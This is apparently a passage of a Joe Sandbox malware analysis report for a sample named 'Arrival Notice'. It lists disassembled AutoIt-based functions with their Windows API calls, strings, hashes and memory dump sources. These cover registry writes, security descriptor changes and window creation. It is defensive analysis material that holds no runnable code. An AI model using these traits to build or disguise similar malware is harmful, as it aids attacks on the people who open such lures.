                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                  • String ID: 0
                  • API String ID: 2760611726-4108050209
                  • Opcode ID: 3feaaa8cbca49b398170aa9d6f03b111c5b6f6eee6c5c592013d4ae94fa89920
                  • Instruction ID: fe660439114e108f033a731512f3c461b6dd2e1b1d1c2047af796608545e23b5
                  • Opcode Fuzzy Hash: 3feaaa8cbca49b398170aa9d6f03b111c5b6f6eee6c5c592013d4ae94fa89920
                  • Instruction Fuzzy Hash: 6512AE742012119FD725CF24C884BAAB7F5FF45300F19447EE486EB6A1CB35AD62CB99
                  Function 00432711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                  Download Yara Rule
                  APIs
                  • DestroyWindow.USER32(00000000), ref: 0043273E
                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0043286A
                  • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 004328A9
                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 004328B9
                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00432900
                  • GetClientRect.USER32(00000000,?), ref: 0043290C
                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00432955
                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00432964
                  • GetStockObject.GDI32(00000011), ref: 00432974
                  • SelectObject.GDI32(00000000,00000000), ref: 00432978
                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00432988
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00432991
                  • DeleteDC.GDI32(00000000), ref: 0043299A
                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004329C6
                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 004329DD
                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00432A1D
                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00432A31
                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00432A42
                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00432A77
                  • GetStockObject.GDI32(00000011), ref: 00432A82
                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00432A8D
                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00432A97
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                  • API String ID: 2910397461-517079104
                  • Opcode ID: b7033b3e00b14b60f070917eb5155bfe81817a67cafb02fd904a6b5c973dfbe5
                  • Instruction ID: 504d55a067e11d3f02e0b4182db9025eda6e5094347bf9d2eed790c5254a03f1
                  • Opcode Fuzzy Hash: b7033b3e00b14b60f070917eb5155bfe81817a67cafb02fd904a6b5c973dfbe5
                  • Instruction Fuzzy Hash: 80B18175A00215AFEB14DF68CD85FAE7BA9FB09710F004525FA15EB2A0D774ED00CBA8
                  Function 00424ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                  Download Yara Rule
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 00424AED
                  • GetDriveTypeW.KERNEL32(?,0044CB68,?,\\.\,0044CC08), ref: 00424BCA
                  • SetErrorMode.KERNEL32(00000000,0044CB68,?,\\.\,0044CC08), ref: 00424D36
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorMode$DriveType
                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                  • API String ID: 2907320926-4222207086
                  • Opcode ID: d64cde0871c5277d7248475687b16089ffd091f0c2008312b8cebacb6484c072
                  • Instruction ID: 565b38652cbcb761da5c70473ef0e010818b034147e9ada88569efb2be03fc9d
                  • Opcode Fuzzy Hash: d64cde0871c5277d7248475687b16089ffd091f0c2008312b8cebacb6484c072
                  • Instruction Fuzzy Hash: 416165307001159FCB15DF19DA81AE977A1EB80304BB28017F80AAB751CB7DEC42CB5E
                  Function 004473E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetSysColor.USER32(00000012), ref: 00447421
                  • SetTextColor.GDI32(?,?), ref: 00447425
                  • GetSysColorBrush.USER32(0000000F), ref: 0044743B
                  • GetSysColor.USER32(0000000F), ref: 00447446
                  • CreateSolidBrush.GDI32(?), ref: 0044744B
                  • GetSysColor.USER32(00000011), ref: 00447463
                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00447471
                  • SelectObject.GDI32(?,00000000), ref: 00447482
                  • SetBkColor.GDI32(?,00000000), ref: 0044748B
                  • SelectObject.GDI32(?,?), ref: 00447498
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004474B7
                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004474CE
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 004474DB
                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0044752A
                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00447554
                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00447572
                  • DrawFocusRect.USER32(?,?), ref: 0044757D
                  • GetSysColor.USER32(00000011), ref: 0044758E
                  • SetTextColor.GDI32(?,00000000), ref: 00447596
                  • DrawTextW.USER32(?,004470F5,000000FF,?,00000000), ref: 004475A8
                  • SelectObject.GDI32(?,?), ref: 004475BF
                  • DeleteObject.GDI32(?), ref: 004475CA
                  • SelectObject.GDI32(?,?), ref: 004475D0
                  • DeleteObject.GDI32(?), ref: 004475D5
                  • SetTextColor.GDI32(?,?), ref: 004475DB
                  • SetBkColor.GDI32(?,?), ref: 004475E5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                  • String ID:
                  • API String ID: 1996641542-0
                  • Opcode ID: e78924a21c36b6b6b0c44b89b0460bcb6311c9ca4e1f6126f4f78c688db891ff
                  • Instruction ID: c78a67434e0e22f4e2bf7b672100a97ff5f1f13ce23382f091795a2f847cda9b
                  • Opcode Fuzzy Hash: e78924a21c36b6b6b0c44b89b0460bcb6311c9ca4e1f6126f4f78c688db891ff
                  • Instruction Fuzzy Hash: BD619D76901218BFEF019FA4DC88EAEBFB9EB09320F154125F911BB2A1D7749941CF94
                  Function 00440FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetCursorPos.USER32(?), ref: 00441128
                  • GetDesktopWindow.USER32 ref: 0044113D
                  • GetWindowRect.USER32(00000000), ref: 00441144
                  • GetWindowLongW.USER32(?,000000F0), ref: 00441199
                  • DestroyWindow.USER32(?), ref: 004411B9
                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004411ED
                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044120B
                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0044121D
                  • SendMessageW.USER32(00000000,00000421,?,?), ref: 00441232
                  • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00441245
                  • IsWindowVisible.USER32(00000000), ref: 004412A1
                  • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 004412BC
                  • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 004412D0
                  • GetWindowRect.USER32(00000000,?), ref: 004412E8
                  • MonitorFromPoint.USER32(?,?,00000002), ref: 0044130E
                  • GetMonitorInfoW.USER32(00000000,?), ref: 00441328
                  • CopyRect.USER32(?,?), ref: 0044133F
                  • SendMessageW.USER32(00000000,00000412,00000000), ref: 004413AA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                  • String ID: ($0$tooltips_class32
                  • API String ID: 698492251-4156429822
                  • Opcode ID: 2c56376c51075ac6bdcf359adf9fdff732fe74c7b07cbb400eafaee04db32cb8
                  • Instruction ID: eb76392ecf012a65cb85c466dba70bbbdf9d1cf3ba8627be02eb9cf2e480ece4
                  • Opcode Fuzzy Hash: 2c56376c51075ac6bdcf359adf9fdff732fe74c7b07cbb400eafaee04db32cb8
                  • Instruction Fuzzy Hash: 3DB19E71604341AFE710DF64C884BABBBE4FF89344F00891EF9999B261CB75E844CB96
                  Function 003C8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                  Download Yara Rule
                  APIs
                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003C8968
                  • GetSystemMetrics.USER32(00000007), ref: 003C8970
                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003C899B
                  • GetSystemMetrics.USER32(00000008), ref: 003C89A3
                  • GetSystemMetrics.USER32(00000004), ref: 003C89C8
                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003C89E5
                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003C89F5
                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 003C8A28
                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 003C8A3C
                  • GetClientRect.USER32(00000000,000000FF), ref: 003C8A5A
                  • GetStockObject.GDI32(00000011), ref: 003C8A76
                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 003C8A81
                    • Part of subcall function 003C912D: GetCursorPos.USER32(?), ref: 003C9141
                    • Part of subcall function 003C912D: ScreenToClient.USER32(00000000,?), ref: 003C915E
                    • Part of subcall function 003C912D: GetAsyncKeyState.USER32(00000001), ref: 003C9183
                    • Part of subcall function 003C912D: GetAsyncKeyState.USER32(00000002), ref: 003C919D
                  • SetTimer.USER32(00000000,00000000,00000028,003C90FC), ref: 003C8AA8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                  • String ID: AutoIt v3 GUI
                  • API String ID: 1458621304-248962490
                  • Opcode ID: eb52daf9777005321e29175d0f386e6eafff15a83ecd7a6ab8cc88589d226de3
                  • Instruction ID: d56baf53b975fe34f45f585930d2b5f512eac6c4ad67f66965ff8bb23b601afd
                  • Opcode Fuzzy Hash: eb52daf9777005321e29175d0f386e6eafff15a83ecd7a6ab8cc88589d226de3
                  • Instruction Fuzzy Hash: 3CB18075600209AFDB15DF68CC85FAE3BB5FB48314F15422AFA05E7290DB34A941CB58
                  Function 00410D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00411114
                    • Part of subcall function 004110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 00411120
                    • Part of subcall function 004110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 0041112F
                    • Part of subcall function 004110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 00411136
                    • Part of subcall function 004110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0041114D
                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00410DF5
                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00410E29
                  • GetLengthSid.ADVAPI32(?), ref: 00410E40
                  • GetAce.ADVAPI32(?,00000000,?), ref: 00410E7A
                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00410E96
                  • GetLengthSid.ADVAPI32(?), ref: 00410EAD
                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00410EB5
                  • HeapAlloc.KERNEL32(00000000), ref: 00410EBC
                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00410EDD
                  • CopySid.ADVAPI32(00000000), ref: 00410EE4
                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00410F13
                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00410F35
                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00410F47
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410F6E
                  • HeapFree.KERNEL32(00000000), ref: 00410F75
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410F7E
                  • HeapFree.KERNEL32(00000000), ref: 00410F85
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410F8E
                  • HeapFree.KERNEL32(00000000), ref: 00410F95
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00410FA1
                  • HeapFree.KERNEL32(00000000), ref: 00410FA8
                    • Part of subcall function 00411193: GetProcessHeap.KERNEL32(00000008,00410BB1,?,00000000,?,00410BB1,?), ref: 004111A1
                    • Part of subcall function 00411193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00410BB1,?), ref: 004111A8
                    • Part of subcall function 00411193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00410BB1,?), ref: 004111B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                  • String ID:
                  • API String ID: 4175595110-0
                  • Opcode ID: 9962e428fe9b9e884370411c14ce3de91c9cd2b6699430234bd0c34a21a8b073
                  • Instruction ID: 3bb704898f3d1ba496866a42cbedfd77a73e0a0bee144f91acd4345967510d4b
                  • Opcode Fuzzy Hash: 9962e428fe9b9e884370411c14ce3de91c9cd2b6699430234bd0c34a21a8b073
                  • Instruction Fuzzy Hash: B1718F7590120AEBDF209FA5DC45FEFBBB8BF05300F044126F919A6291D7B4D986CB68
                  Function 0043C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0043C4BD
                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0044CC08,00000000,?,00000000,?,?), ref: 0043C544
                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0043C5A4
                  • _wcslen.LIBCMT ref: 0043C5F4
                  • _wcslen.LIBCMT ref: 0043C66F
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0043C6B2
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0043C7C1
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0043C84D
                  • RegCloseKey.ADVAPI32(?), ref: 0043C881
                  • RegCloseKey.ADVAPI32(00000000), ref: 0043C88E
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0043C960
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                  • API String ID: 9721498-966354055
                  • Opcode ID: 24f44d659b00a7572c2fd5fd2af82fd94f2e9f47d9392fa52a1d9232e19e8c5a
                  • Instruction ID: d1107b04bf85d0c9dc81a4dcf9d8b28cdeca4588113591d3782323f37698d029
                  • Opcode Fuzzy Hash: 24f44d659b00a7572c2fd5fd2af82fd94f2e9f47d9392fa52a1d9232e19e8c5a
                  • Instruction Fuzzy Hash: DC128A352042019FC715DF14C881B6AB7E5EF89718F14889EF98AAB7A2DB35FD01CB85
                  Function 0044091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                  Download Yara Rule
                  APIs
                  • CharUpperBuffW.USER32(?,?), ref: 004409C6
                  • _wcslen.LIBCMT ref: 00440A01
                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00440A54
                  • _wcslen.LIBCMT ref: 00440A8A
                  • _wcslen.LIBCMT ref: 00440B06
                  • _wcslen.LIBCMT ref: 00440B81
                    • Part of subcall function 003CF9F2: _wcslen.LIBCMT ref: 003CF9FD
                    • Part of subcall function 00412BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00412BFA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$MessageSend$BuffCharUpper
                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                  • API String ID: 1103490817-4258414348
                  • Opcode ID: b93541e53098846d0c764eacf2c87218551ac02d088308ad9da5f3eefc49ba9a
                  • Instruction ID: b858df297180d3eb3e5d9cd2db5723e2eb8c77b98687b6e9409c8c07d0b96bdc
                  • Opcode Fuzzy Hash: b93541e53098846d0c764eacf2c87218551ac02d088308ad9da5f3eefc49ba9a
                  • Instruction Fuzzy Hash: 0BE1F2312083018FC714DF24C45196AB7E1FF98308F14895EF99AAB762D738ED56CB8A
                  Function 0043C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharUpper
                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                  • API String ID: 1256254125-909552448
                  • Opcode ID: 597bae2c14bba70fb4ab405f6e2a3fb6b564fcf76c936097875f26c16e598f8b
                  • Instruction ID: ad45dffe594e05d2618a350962c87873383182a6d0d917edbb5b1270a8b98182
                  • Opcode Fuzzy Hash: 597bae2c14bba70fb4ab405f6e2a3fb6b564fcf76c936097875f26c16e598f8b
                  • Instruction Fuzzy Hash: A171F53360012A8BCB10EE68DC916FB33919B68754F21612BE865BB384E739DD458399
                  Function 0044833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                  Download Yara Rule
                  APIs
                  • _wcslen.LIBCMT ref: 0044835A
                  • _wcslen.LIBCMT ref: 0044836E
                  • _wcslen.LIBCMT ref: 00448391
                  • _wcslen.LIBCMT ref: 004483B4
                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004483F2
                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0044361A,?), ref: 0044844E
                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00448487
                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 004484CA
                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00448501
                  • FreeLibrary.KERNEL32(?), ref: 0044850D
                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0044851D
                  • DestroyIcon.USER32(?), ref: 0044852C
                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00448549
                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00448555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                  • String ID: .dll$.exe$.icl
                  • API String ID: 799131459-1154884017
                  • Opcode ID: 8dde8f2a8b2f0a3ac9063408b333719997d50d640b9f5c4734fafcf049e6ae89
                  • Instruction ID: 853d03a969eeed0c7165d102e7f8d0d6f153d4c7f06d26ba085810a04b80b34c
                  • Opcode Fuzzy Hash: 8dde8f2a8b2f0a3ac9063408b333719997d50d640b9f5c4734fafcf049e6ae89
                  • Instruction Fuzzy Hash: D761F171900215BBFB14CF64DC81BFF77A8BB04B11F10461AF915DA2D1EB78AA80CBA4
                  Function 003B7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
